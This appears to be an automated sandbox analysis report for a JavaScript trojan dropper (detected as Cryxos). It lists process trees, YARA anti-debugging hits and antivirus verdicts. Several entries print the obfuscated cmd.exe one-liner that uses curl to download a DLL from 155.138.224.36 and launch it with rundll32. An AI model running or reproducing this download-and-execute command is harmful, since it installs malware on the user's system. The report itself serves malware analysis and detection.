Category | Machine | Started | Completed |
---|---|---|---|
FILE | s1_win7_x6401 | Oct. 26, 2023, 10:32 a.m. | Oct. 26, 2023, 10:35 a.m. |
-
-
cmd.exe "C:\Windows\System32\cmd.exe" /c bo || EchO bo & ping bo || CurL http://155.138.224.36/abb/unsec -o %tMp%\bo.dlld & ping -n 2 bo || rundLL32 %tmP%\bo.dlld, Crash & exIt GMDeoHZtDpvO
2692-
PING.EXE ping bo
2784 -
curl.exe CurL http://155.138.224.36/abb/unsec -o C:\Users\test22\AppData\Local\Temp\bo.dlld
2848 -
PING.EXE ping -n 2 bo
2984 -
rundll32.exe rundLL32 C:\Users\test22\AppData\Local\Temp\bo.dlld, Crash
3032
-
-
Name | Response | Post-Analysis Lookup |
---|---|---|
www.ssl.com | 54.87.241.101 |
Suricata Alerts
No Suricata Alerts
Suricata TLS
No Suricata TLS
request | GET http://www.ssl.com/repository/SSLcomRootCertificationAuthorityRSA.crt |
cmdline | cmd.exe /c bo || EchO bo & ping bo || CurL http://155.138.224.36/abb/unsec -o %tMp%\bo.dlld & ping -n 2 bo || rundLL32 %tmP%\bo.dlld, Crash & exIt GMDeoHZtDpvO |
cmdline | "C:\Windows\System32\cmd.exe" /c bo || EchO bo & ping bo || CurL http://155.138.224.36/abb/unsec -o %tMp%\bo.dlld & ping -n 2 bo || rundLL32 %tmP%\bo.dlld, Crash & exIt GMDeoHZtDpvO |
description | (no description) | rule | DebuggerCheck__GlobalFlags | ||||||
description | (no description) | rule | DebuggerCheck__QueryInfo | ||||||
description | (no description) | rule | DebuggerHiding__Thread | ||||||
description | (no description) | rule | DebuggerHiding__Active | ||||||
description | (no description) | rule | DebuggerException__SetConsoleCtrl | ||||||
description | (no description) | rule | ThreadControl__Context | ||||||
description | (no description) | rule | SEH__vectored | ||||||
description | Checks if being debugged | rule | anti_dbg | ||||||
description | Bypass DEP | rule | disable_dep |
cmdline | cmd.exe /c bo || EchO bo & ping bo || CurL http://155.138.224.36/abb/unsec -o %tMp%\bo.dlld & ping -n 2 bo || rundLL32 %tmP%\bo.dlld, Crash & exIt GMDeoHZtDpvO |
cmdline | ping bo |
cmdline | "C:\Windows\System32\cmd.exe" /c bo || EchO bo & ping bo || CurL http://155.138.224.36/abb/unsec -o %tMp%\bo.dlld & ping -n 2 bo || rundLL32 %tmP%\bo.dlld, Crash & exIt GMDeoHZtDpvO |
cmdline | ping -n 2 bo |
host | 155.138.224.36 |
ALYac | JS:Trojan.Cryxos.13196 |
VIPRE | JS:Trojan.Cryxos.13196 |
Kaspersky | HEUR:Trojan.Script.Generic |
BitDefender | JS:Trojan.Cryxos.13196 |
MicroWorld-eScan | JS:Trojan.Cryxos.13196 |
FireEye | JS:Trojan.Cryxos.13196 |
Emsisoft | JS:Trojan.Cryxos.13196 (B) |
Ikarus | Trojan.JS.Cryxos |
Varist | URL/Downldr.EB5.gen!Eldorado |
Microsoft | Trojan:Win32/Phonzy.C!ml |
Arcabit | JS:Trojan.Cryxos.D338C |
GData | JS:Trojan.Cryxos.13196 |
Detected | |
MAX | malware (ai score=80) |
parent_process | wscript.exe | martian_process | cmd.exe /c bo || EchO bo & ping bo || CurL http://155.138.224.36/abb/unsec -o %tMp%\bo.dlld & ping -n 2 bo || rundLL32 %tmP%\bo.dlld, Crash & exIt GMDeoHZtDpvO | ||||||
parent_process | wscript.exe | martian_process | "C:\Windows\System32\cmd.exe" /c bo || EchO bo & ping bo || CurL http://155.138.224.36/abb/unsec -o %tMp%\bo.dlld & ping -n 2 bo || rundLL32 %tmP%\bo.dlld, Crash & exIt GMDeoHZtDpvO |
dead_host | 155.138.224.36:80 |
file | C:\Windows\System32\cmd.exe |